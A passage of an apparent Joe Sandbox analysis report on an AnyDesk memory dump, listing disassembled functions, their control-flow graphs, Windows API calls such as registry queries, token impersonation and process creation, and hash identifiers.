                                                                                                                                                                                                                                                  • GetCommandLineW.KERNEL32(00000000,?,?,?,?,?,69C3EF5E,00000000,00000000,00000000), ref: 69C28AD6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CommandLine
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3253501508-0
                                                                                                                                                                                                                                                  • Opcode ID: 507593138f47d143efdfa5432b9fa5cb50c22903db5ee83b8fbb9923ac6d2962
                                                                                                                                                                                                                                                  • Instruction ID: ba0dc57638f680b792357596d399ad8820882904a79291fdc25c4c38994ba8b0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 507593138f47d143efdfa5432b9fa5cb50c22903db5ee83b8fbb9923ac6d2962
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D018475654200DFCB04EF70E855A6BB7A5FB95604F00961DE86A4B290FF309906DBD3
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C340D0 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 61 69c340d0-69c34107 RegOpenKeyExW 62 69c34109-69c3410d 61->62 63 69c3412c-69c34132 61->63 64 69c3411b-69c34129 62->64 65 69c3410f-69c34118 RegCloseKey 62->65 64->63 65->64
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(00020219,?,00000000,?,?), ref: 69C340FD
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 69C34110
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 47109696-0
                                                                                                                                                                                                                                                  • Opcode ID: fa61e901229770cadcf1355d9fb415d2e997cb5d6f2335321ed3ddb06bc5082e
                                                                                                                                                                                                                                                  • Instruction ID: b606b0fdd7c483e3ceb0429f490ca98e9314dc104dd11a7a6cb075b3489afdae
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa61e901229770cadcf1355d9fb415d2e997cb5d6f2335321ed3ddb06bc5082e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9F08C71205305AFD7208F0AC845B1BFBF8FB98321F40852EF9A9C3240E771E8048BA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C3EF28 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • new.LIBCMT ref: 69C3EF37
                                                                                                                                                                                                                                                    • Part of subcall function 69C27AB0: new.LIBCMT ref: 69C27AF2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9495f990225b6cf4c86bf3b81041fb7117de8de753ad40680a4f476e959353e5
                                                                                                                                                                                                                                                  • Instruction ID: a7fadeb3f30d2708bedacaaeed778f08949121311d7ee57c98cc426f6487a9fe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9495f990225b6cf4c86bf3b81041fb7117de8de753ad40680a4f476e959353e5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD01A2369152349BDB14EB65B815BAE3778BF05768F40D51AD8206B180FF749901CBE2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C34140 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 92 69c34140-69c3415c RegQueryValueExW
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RegQueryValueExW.KERNEL32(80000002,00020219,00000000,00000000,00000000,00000000,?,69C5F4D8,69C763E8,?,Software\Google\Update\Clients\{8A69D345-D564-463c-AFF1-A69D9E530F96},00020219,7FFFFFFF,80000002), ref: 69C34150
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3660427363-0
                                                                                                                                                                                                                                                  • Opcode ID: 0e0dcf3a06f332375a8fd41fb260d34e5ce8fdf71cb5263dfd66e4866dd20c40
                                                                                                                                                                                                                                                  • Instruction ID: 945847d0c2a1fe7737680583e5622b7b848b7ad4bd9a9e00b7e101ae87c1b491
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e0dcf3a06f332375a8fd41fb260d34e5ce8fdf71cb5263dfd66e4866dd20c40
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46C08C323D4308BBEA201EB1CC03F203A6CEB12F11F300020B30AAC0E0C1A37020964D
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 69C5FFEC Relevance: 25.7, APIs: 17, Instructions: 233comthreadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 139 69c5ffec-69c60019 call 69c2dcb0 call 69c5f310 144 69c602d7-69c602ef call 69c22e00 call 69c40c5d 139->144 145 69c6001f-69c60041 CoInitializeEx CoInitializeSecurity 139->145 146 69c60047-69c60057 call 69c5f4f1 145->146 147 69c602cb-69c602cf 145->147 154 69c601cd-69c60203 call 69c288e0 CoCreateInstance 146->154 155 69c6005d-69c60074 GetCurrentProcessId call 69c5f383 146->155 147->144 150 69c602d1 CoUninitialize 147->150 150->144 161 69c60205-69c60244 call 69c29690 call 69c24780 154->161 162 69c60253-69c6029b call 69c29690 call 69c3b650 call 69c3b6c0 call 69c3b630 call 69c3b620 call 69c24780 call 69c3b690 154->162 155->147 163 69c6007a-69c6009a GetShellWindow GetWindowThreadProcessId 155->163 184 69c60246-69c60251 161->184 185 69c6029e-69c602a5 161->185 162->185 165 69c6009c-69c600a8 LocalFree 163->165 166 69c600ad-69c600c0 call 69c5f383 163->166 165->147 175 69c600c6-69c600d8 call 69c56951 166->175 176 69c601b5-69c601c7 LocalFree 166->176 186 69c600de-69c60110 OpenProcess call 69c2eab0 call 69c2ea90 175->186 187 69c601ac-69c601af LocalFree 175->187 176->147 176->154 184->185 189 69c602a7-69c602ad RevertToSelf 185->189 190 69c602b0-69c602b8 185->190 202 69c60116-69c60139 OpenProcessToken 186->202 203 69c601a1-69c601a7 call 69c2eb30 186->203 187->176 189->190 195 69c602c0-69c602c6 call 69c28a00 190->195 196 69c602ba-69c602bc 190->196 195->147 196->195 205 69c6013b-69c60156 DuplicateTokenEx 202->205 206 69c60178-69c60184 202->206 203->187 205->206 209 69c60158-69c60172 ImpersonateLoggedOnUser 205->209 210 69c60186-69c6018c CloseHandle 206->210 211 69c6018e-69c60194 206->211 209->206 210->211 213 69c60196-69c6019c CloseHandle 211->213 214 69c6019e-69c601a0 211->214 213->214 214->203
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 69C60024
                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000002,00000000,00000040,00000000), ref: 69C60039
                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 69C602D1
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F4F1: GetCurrentProcess.KERNEL32(00000008,?), ref: 69C5F50F
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F4F1: OpenProcessToken.ADVAPI32(00000000), ref: 69C5F516
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F4F1: GetTokenInformation.ADVAPI32(?,00000012(TokenIntegrityLevel),?,00000004,00000000), ref: 69C5F53A
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F4F1: CloseHandle.KERNEL32(?), ref: 69C5F547
                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?), ref: 69C60064
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F383: OpenProcess.KERNEL32(00000400,00000001,?,00000000,00000000), ref: 69C5F396
                                                                                                                                                                                                                                                  • GetShellWindow.USER32 ref: 69C60087
                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 69C6008E
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 69C600A2
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000440,00000001,?), ref: 69C600EA
                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(?,0000000A,?,00000000), ref: 69C60131
                                                                                                                                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,0000000F,00000000,00000002,00000001,?), ref: 69C6014E
                                                                                                                                                                                                                                                  • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 69C6015E
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C6018C
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C6019C
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 69C601AF
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 69C601BB
                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(69C765CC,00000000,00000004,69C765BC,?,?), ref: 69C601F0
                                                                                                                                                                                                                                                  • RevertToSelf.ADVAPI32(00000001,00000000), ref: 69C602A7
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$OpenToken$CloseFreeHandleLocal$CurrentInitializeWindow$CreateDuplicateImpersonateInformationInstanceLoggedRevertSecuritySelfShellThreadUninitializeUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1086148846-0
                                                                                                                                                                                                                                                  • Opcode ID: 10ecc39cefe7bb4abbc223a5bb1e4b4c320567f4369b426ef10159e1ce867620
                                                                                                                                                                                                                                                  • Instruction ID: 68cc1ed05980b6b1f7f75deaef84e7b05d464fa4efec92cb969bb7d423bffed3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10ecc39cefe7bb4abbc223a5bb1e4b4c320567f4369b426ef10159e1ce867620
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3816E71900219AFEF20DFA2DC84FADBB79BF45314F4080A9E51AA6191EF319E45DF20
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C3B6C0 Relevance: 25.0, APIs: 13, Strings: 1, Instructions: 504COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 215 69c3b6c0-69c3b716 call 69c3d530 218 69c3b728-69c3b757 215->218 219 69c3b718-69c3b71d 215->219 222 69c3b767-69c3b76d 218->222 223 69c3b759-69c3b75c 218->223 220 69c3b863-69c3b86b call 69c32cd0 219->220 221 69c3b723 219->221 236 69c3b87b-69c3b88b 220->236 237 69c3b86d-69c3b876 call 69c3b5d0 220->237 221->218 226 69c3b786-69c3b788 222->226 227 69c3b76f-69c3b782 call 69c22400 222->227 223->222 225 69c3b75e-69c3b761 223->225 225->222 229 69c3b7f7-69c3b7fb 225->229 231 69c3b7a1-69c3b7a3 226->231 232 69c3b78a-69c3b79d call 69c22400 226->232 227->226 238 69c3b801-69c3b80d 229->238 239 69c3b9fb 229->239 234 69c3b7a5-69c3b7ba call 69c22400 231->234 235 69c3b7be-69c3b7c3 231->235 232->231 234->235 243 69c3b7c5-69c3b7d5 call 69c22400 235->243 244 69c3b7da-69c3b7f3 235->244 248 69c3b89b-69c3b8a2 236->248 249 69c3b88d-69c3b896 call 69c3b5d0 236->249 266 69c3bdfa-69c3be00 237->266 246 69c3b843-69c3b84f 238->246 247 69c3b80f-69c3b835 call 69c408da call 69c32a20 238->247 250 69c3b9ff-69c3ba03 239->250 243->244 244->229 246->250 254 69c3b855-69c3b85e 246->254 247->246 287 69c3b837-69c3b839 247->287 251 69c3b8e3-69c3b8ef call 69c3d600 248->251 252 69c3b8a4-69c3b8b2 SetHandleInformation 248->252 249->266 259 69c3ba05-69c3ba0a 250->259 260 69c3ba0e-69c3ba1d 250->260 284 69c3b942-69c3b95d 251->284 285 69c3b8f1-69c3b8f6 251->285 263 69c3b8c1-69c3b8c7 252->263 264 69c3b8b4-69c3b8ba 252->264 254->250 259->260 261 69c3ba29-69c3ba34 260->261 262 69c3ba1f-69c3ba27 260->262 269 69c3ba3c-69c3ba74 call 69c24970 261->269 270 69c3ba36-69c3ba38 261->270 262->269 273 69c3b8c9-69c3b8d7 call 69c22400 263->273 274 69c3b8dc-69c3b8e1 263->274 271 69c3b8c0 264->271 272 69c3be2b-69c3be2d call 69c49f77 264->272 276 69c3be02-69c3be12 call 69c40c6e 266->276 277 69c3be15-69c3be2a call 69c40c5d 266->277 296 69c3bb60-69c3bba4 CreateProcessW 269->296 297 69c3ba7a-69c3ba9a CreateEnvironmentBlock 269->297 270->269 271->263 290 69c3be32-69c3be3f call 69c3fc31 272->290 273->274 274->251 274->252 276->277 284->290 291 69c3b963-69c3b969 284->291 292 69c3b904-69c3b917 call 69c3b5d0 285->292 293 69c3b8f8-69c3b8ff call 69c22ba0 285->293 287->246 295 69c3b83b-69c3b83e call 69c329e0 287->295 299 69c3b9a6-69c3b9ab 291->299 300 69c3b96b-69c3b98d 291->300 314 69c3b919-69c3b929 call 69c40c6e 292->314 315 69c3b92c-69c3b941 call 69c40c5d 292->315 293->292 295->246 310 69c3bba6-69c3bbaf 296->310 311 69c3bc04-69c3bc5f call 69c2eab0 * 2 296->311 308 69c3bac0-69c3bb15 CreateProcessAsUserW DestroyEnvironmentBlock 297->308 309 69c3ba9c-69c3baa4 297->309 303 69c3b9b9-69c3b9cc call 69c3b5d0 299->303 304 69c3b9ad-69c3b9b4 call 69c22ba0 299->304 300->299 333 69c3b98f-69c3b9a1 300->333 303->315 341 69c3b9d2-69c3b9fa call 69c40c6e call 69c40c5d 303->341 304->303 323 69c3bc00 308->323 324 69c3bb1b-69c3bb24 308->324 318 69c3bab2-69c3babb call 69c3b5d0 309->318 319 69c3baa6-69c3baad call 69c22ba0 309->319 320 69c3bbb1-69c3bbc6 call 69c22ba0 310->320 321 69c3bbca-69c3bbcf 310->321 358 69c3bd67-69c3bd6a 311->358 359 69c3bc65-69c3bc72 AssignProcessToJobObject 311->359 314->315 354 69c3bdbd-69c3bdc7 318->354 319->318 320->321 331 69c3bbf2-69c3bbfb call 69c3b5d0 321->331 332 69c3bbd1-69c3bbdb 321->332 323->311 334 69c3bb26-69c3bb3b call 69c22ba0 324->334 335 69c3bb3f-69c3bb44 324->335 331->354 332->331 346 69c3bbdd-69c3bbed call 69c25280 332->346 333->218 334->335 339 69c3bb52-69c3bb5b call 69c3b5d0 335->339 340 69c3bb46-69c3bb4d call 69c22f70 335->340 339->354 340->339 346->331 360 69c3bdc9-69c3bdd9 call 69c26a20 354->360 361 69c3bdde-69c3bdf3 354->361 366 69c3bd78-69c3bdb8 call 69c3d6c0 call 69c3b5d0 call 69c2eb30 * 4 358->366 367 69c3bd6c-69c3bd72 WaitForSingleObject 358->367 363 69c3bc78-69c3bc81 359->363 364 69c3bd5d-69c3bd61 ResumeThread 359->364 360->361 361->266 369 69c3bc83-69c3bc93 call 69c22400 363->369 370 69c3bc98-69c3bcb4 call 69c3d6c0 call 69c3b5d0 363->370 364->358 366->354 367->366 369->370 383 69c3bcb6-69c3bcc6 call 69c22400 370->383 384 69c3bccb-69c3bcd6 370->384 383->384 388 69c3bcd8-69c3bcda GetCurrentProcess 384->388 389 69c3bcdc 384->389 391 69c3bce0-69c3bcf0 TerminateProcess 388->391 389->391 393 69c3bcf2-69c3bcf7 391->393 394 69c3bd1b 391->394 396 69c3bcf9-69c3bcfb GetCurrentProcess 393->396 397 69c3bcfd 393->397 398 69c3bd23 394->398 402 69c3bd01-69c3bd0f WaitForSingleObject 396->402 397->402 399 69c3bd31-69c3bd58 call 69c3b5d0 call 69c2eb30 call 69c3d680 call 69c22e00 398->399 400 69c3bd25-69c3bd2c call 69c22ba0 398->400 399->266 400->399 402->399 405 69c3bd11-69c3bd19 402->405 405->398
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C3D530: new.LIBCMT ref: 69C3D54D
                                                                                                                                                                                                                                                  • new.LIBCMT ref: 69C3B811
                                                                                                                                                                                                                                                  • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 69C3B8AA
                                                                                                                                                                                                                                                    • Part of subcall function 69C3B5D0: GetCurrentProcess.KERNEL32(00000001,?,00000001), ref: 69C3B5F4
                                                                                                                                                                                                                                                    • Part of subcall function 69C3FC31: std::invalid_argument::invalid_argument.LIBCONCRT ref: 69C3FC3D
                                                                                                                                                                                                                                                    • Part of subcall function 69C3FC31: __CxxThrowException@8.LIBVCRUNTIME ref: 69C3FC4B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • invalid vector<T> subscript, xrefs: 69C3BE32
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentException@8HandleInformationProcessThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: invalid vector<T> subscript
                                                                                                                                                                                                                                                  • API String ID: 2615769013-3016609489
                                                                                                                                                                                                                                                  • Opcode ID: 617790d59962363e6e6bf5916b6e907fa640904acbda6f86427a1c2483ce745a
                                                                                                                                                                                                                                                  • Instruction ID: 8c794af2a06e340bb50a94d4b43c068a0dd750a6f243fb57b0a39a9494e1c23b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 617790d59962363e6e6bf5916b6e907fa640904acbda6f86427a1c2483ce745a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F127C356087509FE724CF25E850BABB7F4BF85318F80891DF4AA97290EB34E945CB52
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C32A20 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 172libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 69C32A4E
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process), ref: 69C32A64
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 69C32A6B
                                                                                                                                                                                                                                                  • GetVersionExW.KERNEL32(0000011C), ref: 69C32AE0
                                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 69C32B3C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressCurrentHandleInfoModuleNativeProcProcessSystemVersion
                                                                                                                                                                                                                                                  • String ID: GetProductInfo$IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 1167739923-1263506661
                                                                                                                                                                                                                                                  • Opcode ID: 2a1dd8215e88149a4d6b68c14a8ffe4a1eaec83c0b428c5542d0652ad9a70698
                                                                                                                                                                                                                                                  • Instruction ID: 71e747aa0bad0ac4c180a88fca31812594421f46ddc7cfc187df9c22ae987adb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a1dd8215e88149a4d6b68c14a8ffe4a1eaec83c0b428c5542d0652ad9a70698
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B617F70900628CBDF30CF69E9557EAB7F4EF09314F50059AE48AD7240EB75AA85CF81
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C52301 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$_memcmp
                                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                                  • API String ID: 789029625-1037565863
